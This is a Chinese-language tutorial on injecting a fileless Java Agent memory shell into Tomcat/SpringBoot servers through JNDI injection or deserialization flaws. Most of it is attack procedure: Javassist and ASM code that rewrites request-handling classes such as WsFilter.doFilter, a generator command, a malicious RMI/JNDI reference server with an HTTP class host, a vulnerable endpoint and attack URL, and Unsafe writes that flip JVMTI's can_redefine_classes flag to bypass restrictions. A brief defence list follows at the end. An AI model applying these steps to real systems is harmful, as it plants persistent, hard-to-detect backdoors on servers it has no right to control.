无文件落地注入Agent内存马技术详解<\/h1>

一、技术概述<\/h2>
无文件落地注入Agent内存马技术是一种高级攻击技术，适用于具有动态代码上下文执行能力的场景。该技术通过Java Agent机制在内存中动态修改目标类的字节码，实现持久化后门植入，且无需在目标服务器上落地任何文件。<\/p>

适用条件<\/h3>

目标系统需具备动态代码执行能力（非单纯的Runtime.getRuntime().exec()）<\/li>
需要存在JNDI注入或反序列化漏洞等攻击入口<\/li>

适用于JDK低版本（特别是Windows环境）<\/li> <\/ul>

二、技术原理<\/h2>

核心机制<\/h3>

Java Agent技术<\/strong>：通过Instrumentation API动态修改已加载类的字节码<\/li>
JNDI注入<\/strong>：作为攻击入口，触发远程类加载<\/li>

内存操作<\/strong>：使用Unsafe类直接操作内存，绕过安全限制<\/li> <\/ol>
关键技术点<\/h3>

通过JVM TI接口修改can_redefine_classes标志<\/li>
动态替换目标类的字节码<\/li>
避免文件落地，完全在内存中完成操作<\/li> <\/ul>
三、环境准备<\/h2>
测试环境<\/h3>

操作系统：Windows 10<\/li>
JDK版本：8u66（推荐低版本）<\/li>
目标应用：SpringBoot 2（暴露反序列化和JNDI接口）<\/li> <\/ul>
工具准备<\/h3>

项目地址<\/strong>：https:\/\/github.com\/whocansee\/FilelessAgentMemShell<\/p>

包含测试所需的简易漏洞环境<\/li>
包含新类字节码生成工具<\/li> <\/ul> <\/li>

必要工具<\/strong>：<\/p>

Javassist（字节码修改）<\/li>
ASM框架（可选，用于复杂修改）<\/li>
Ysomap或其他JNDI服务器工具<\/li> <\/ul> <\/li> <\/ol>
四、实施步骤<\/h2>
1. 生成用于注入的类文件<\/h3>
选择宿主类<\/h4>
推荐使用的Tomcat容器宿主类（请求处理必经之类）：<\/p>

org.apache.tomcat.websocket.server.WsFilter<\/code>（推荐）<\/li>
org.springframework.web.servlet.DispatcherServlet<\/code><\/li>
org.apache.catalina.core.ApplicationFilterChain<\/code><\/li>
org.apache.catalina.core.StandardContextValve<\/code><\/li>
javax.servlet.http.HttpServlet<\/code><\/li> <\/ul> 使用Javassist修改字节码<\/h4> ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span>CtClass ctClass =<\/span> pool.<\/span>getCtClass<\/span>(<\/span>"org.apache.tomcat.websocket.server.WsFilter"<\/span>);<\/span> <\/span><\/span>CtMethod m =<\/span> ctClass.<\/span>getDeclaredMethod<\/span>(<\/span>"doFilter"<\/span>);<\/span> <\/span><\/span>m.<\/span>insertBefore<\/span>(<\/span>"Runtime.getRuntime().exec(\"calc\");"<\/span>);<\/span> <\/span><\/span>ctClass.<\/span>writeFile<\/span>();<\/span> <\/span><\/span>ctClass.<\/span>detach<\/span>();<\/span> <\/span><\/span><\/code><\/pre>生成最终类文件<\/h4> java -jar .\F<\/span>ilelessAgentMemshellGenerator.jar -b 64<\/span> -c "org.apache.tomcat.websocket.server.WsFilter"<\/span> -i false -o "Windows"<\/span> -p .\W<\/span>sFilter.class -t false <\/span><\/span><\/code><\/pre>生成的文件位于out文件夹下的AgentMemShell.class<\/code><\/p> 2. 配置JNDI服务器<\/h3> 手工部署JNDI服务器<\/h4> import<\/span> javax.naming.InitialContext;<\/span> <\/span><\/span>import<\/span> javax.naming.Reference;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> JNDIServer<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span> <\/span><\/span> Reference refObj =<\/span> new<\/span> Reference(<\/span>"AgentMemShell"<\/span>,<\/span> "AgentMemShell"<\/span>,<\/span> "http:\/\/localhost:8000\/"<\/span>);<\/span> <\/span><\/span> initialContext.<\/span>rebind<\/span>(<\/span>"rmi:\/\/localhost:11451\/remoteObj"<\/span>,<\/span> refObj);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>配套HTTP服务<\/h4> python -m http.server <\/span><\/span><\/code><\/pre>3. 利用JNDI注入漏洞<\/h3> 漏洞环境示例<\/h4> @GetMapping<\/span>({<\/span>"\/jndi"<\/span>})<\/span> <\/span><\/span>public<\/span> void<\/span> jndi<\/span>(<\/span>@RequestParam<\/span> String b)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> byte<\/span>[]<\/span> decodedBytes =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>b);<\/span> <\/span><\/span> String decodedUrl =<\/span> new<\/span> String(<\/span>decodedBytes,<\/span> StandardCharsets.<\/span>UTF_8<\/span>);<\/span> <\/span><\/span> InitialContext ctx =<\/span> new<\/span> InitialContext();<\/span> <\/span><\/span> ctx.<\/span>lookup<\/span>(<\/span>decodedUrl);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>攻击URL<\/h4> http:\/\/localhost:8080\/memShell\/jndi?b=cm1pOi8vbG9jYWxob3N0OjExNDUxL3JlbW90ZU9iag== <\/code><\/pre> (Base64解码后为rmi:\/\/localhost:11451\/remoteObj<\/code>)<\/p> 五、关键技术问题与解决方案<\/h2> 1. Lambda表达式问题<\/h3> 问题现象<\/h4> 当宿主类方法中包含lambda表达式时，动态替换会失败，控制台报错。<\/p> 影响类示例<\/h4> org.apache.catalina.core.ApplicationFilterChain<\/code>的doFilter()<\/code>方法包含lambda表达式<\/p> 解决方案<\/h4> 方案一：更换宿主类<\/strong><\/p> 选择不含lambda表达式的类，如： org.apache.tomcat.websocket.server.WsFilter<\/code><\/li> org.apache.catalina.core.StandardContextValve<\/code><\/li> <\/ul> <\/li> <\/ul> 方案二：使用ASM框架完全重写方法<\/strong><\/p> import<\/span> org.objectweb.asm.*;<\/span> <\/span><\/span>import<\/span> java.io.FileOutputStream;<\/span> <\/span><\/span>import<\/span> java.io.IOException;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> ModifyCalcMethod<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> byte<\/span>[]<\/span> modifiedClass =<\/span> modifyCalcMethod();<\/span> <\/span><\/span> try<\/span> (<\/span>FileOutputStream fos =<\/span> new<\/span> FileOutputStream(<\/span>"Hello.class"<\/span>))<\/span> {<\/span> <\/span><\/span> fos.<\/span>write<\/span>(<\/span>modifiedClass);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Modified class written to: Hello.class"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> byte<\/span>[]<\/span> modifyCalcMethod<\/span>()<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> ClassReader classReader =<\/span> new<\/span> ClassReader(<\/span>"org.apache.catalina.core.ApplicationFilterChain"<\/span>);<\/span> <\/span><\/span> ClassWriter classWriter =<\/span> new<\/span> ClassWriter(<\/span>ClassWriter.<\/span>COMPUTE_FRAMES<\/span>);<\/span> <\/span><\/span> <\/span><\/span> ClassVisitor classVisitor =<\/span> new<\/span> ClassVisitor(<\/span>Opcodes.<\/span>ASM7<\/span>,<\/span> classWriter)<\/span> {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> MethodVisitor visitMethod<\/span>(<\/span>int<\/span> access,<\/span> String name,<\/span> String desc,<\/span> String signature,<\/span> String[]<\/span> exceptions)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>name.<\/span>equals<\/span>(<\/span>"doFilter"<\/span>))<\/span> {<\/span> <\/span><\/span> MethodVisitor newMethod =<\/span> super<\/span>.<\/span>visitMethod<\/span>(<\/span>access,<\/span> name,<\/span> desc,<\/span> signature,<\/span> exceptions);<\/span> <\/span><\/span> newMethod.<\/span>visitCode<\/span>();<\/span> <\/span><\/span> newMethod.<\/span>visitFieldInsn<\/span>(<\/span>Opcodes.<\/span>GETSTATIC<\/span>,<\/span> "java\/lang\/System"<\/span>,<\/span> "out"<\/span>,<\/span> "Ljava\/io\/PrintStream;"<\/span>);<\/span> <\/span><\/span> newMethod.<\/span>visitLdcInsn<\/span>(<\/span>"Hello, World!"<\/span>);<\/span> <\/span><\/span> newMethod.<\/span>visitMethodInsn<\/span>(<\/span>Opcodes.<\/span>INVOKEVIRTUAL<\/span>,<\/span> "java\/io\/PrintStream"<\/span>,<\/span> "println"<\/span>,<\/span> "(Ljava\/lang\/String;)V"<\/span>,<\/span> false<\/span>);<\/span> <\/span><\/span> newMethod.<\/span>visitInsn<\/span>(<\/span>Opcodes.<\/span>RETURN<\/span>);<\/span> <\/span><\/span> newMethod.<\/span>visitMaxs<\/span>(<\/span>2<\/span>,<\/span> 1<\/span>);<\/span> <\/span><\/span> newMethod.<\/span>visitEnd<\/span>();<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> return<\/span> super<\/span>.<\/span>visitMethod<\/span>(<\/span>access,<\/span> name,<\/span> desc,<\/span> signature,<\/span> exceptions);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> classReader.<\/span>accept<\/span>(<\/span>classVisitor,<\/span> 0<\/span>);<\/span> <\/span><\/span> return<\/span> classWriter.<\/span>toByteArray<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>方案三：修改源代码重新编译<\/strong><\/p> 获取目标类源码（如tomcat-embed-core-9.0.63-sources）<\/li> 将lambda表达式改为匿名类实现<\/li> 重新编译生成class文件<\/li> <\/ol> 2. JDK版本相关问题<\/h3> can_redefine_classes偏移量<\/h4> 不同JDK版本中can_redefine_classes<\/code>标志的偏移量不同：<\/p> \/\/ 64位目标的通用解决方案 <\/span><\/span><\/span><\/span>unsafe.<\/span>putByte<\/span>(<\/span>native_jvmtienv +<\/span> 377<\/span>,<\/span> (<\/span>byte<\/span>)<\/span>2<\/span>);<\/span> <\/span><\/span>unsafe.<\/span>putByte<\/span>(<\/span>native_jvmtienv +<\/span> 361<\/span>,<\/span> (<\/span>byte<\/span>)<\/span>2<\/span>);<\/span> <\/span><\/span>unsafe.<\/span>putByte<\/span>(<\/span>native_jvmtienv +<\/span> 369<\/span>,<\/span> (<\/span>byte<\/span>)<\/span>2<\/span>);<\/span> <\/span><\/span><\/code><\/pre>Unsafe类使用差异<\/h4> JDK8：仅警告<\/li> JDK11+：需编译时添加参数才能使用<\/li> <\/ul> Windows虚拟机实现类<\/h4> JDK8: WindowsVirtualMachine<\/code><\/li> JDK9+: VirtualMachineImpl<\/code><\/li> <\/ul> 3. Payload长度限制问题<\/h3> 解决方案<\/h4> 优化字节码<\/strong>：<\/p> 选择体积小的宿主类<\/li> 删除不影响功能的方法体内容<\/li> <\/ul> <\/li> 转移反序列化流程<\/strong>：<\/p> 利用UnicastRef链、LDAPAttribute链开启新反序列化入口<\/li> <\/ul> <\/li> 解除长度限制<\/strong>：<\/p> 研究目标中间件对不同位置的payload长度限制<\/li> 尝试解除或绕过限制<\/li> <\/ul> <\/li> <\/ol> 六、防御建议<\/h2> 升级JDK<\/strong>：使用高版本JDK（17+）限制不安全反射<\/li> 禁用危险功能<\/strong>：关闭不必要的JNDI、反序列化接口<\/li> 安全加固<\/strong>：设置com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li> 使用Security Manager限制敏感操作<\/li> <\/ul> <\/li> 监控检测<\/strong>：监控Instrumentation API的使用<\/li> 检测异常的类字节码修改行为<\/li> <\/ul> <\/li> 代码审计<\/strong>：检查所有动态代码执行点<\/li> <\/ol> 七、参考资源<\/h2> 论如何优雅的注入Java Agent内存马<\/a><\/li> Java Instrumentation API官方文档<\/li> JVM TI接口规范<\/li> ASM\/Javassist框架文档<\/li> <\/ol>